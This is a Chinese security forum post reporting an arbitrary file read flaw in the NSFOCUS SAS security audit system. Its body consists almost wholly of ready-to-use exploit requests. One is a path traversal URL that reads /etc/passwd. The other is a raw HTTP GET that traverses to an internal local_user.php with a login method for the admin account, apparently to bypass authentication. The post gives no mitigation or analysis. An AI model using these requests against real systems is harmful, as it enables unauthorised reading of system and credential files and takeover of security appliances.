安全矩阵

 找回密码
 立即注册
搜索
查看: 1044|回复: 0

绿盟 sas 安全审计系统任意文件读取

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-8-17 11:22:27 | 显示全部楼层 |阅读模式
  1. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd



  2. GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
  3. Host: xxx.xxx.xxx.xxx:port
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  5. Accept-Encoding: gzip, deflate
  6. Connection: close
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 01:30 , Processed in 0.017122 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表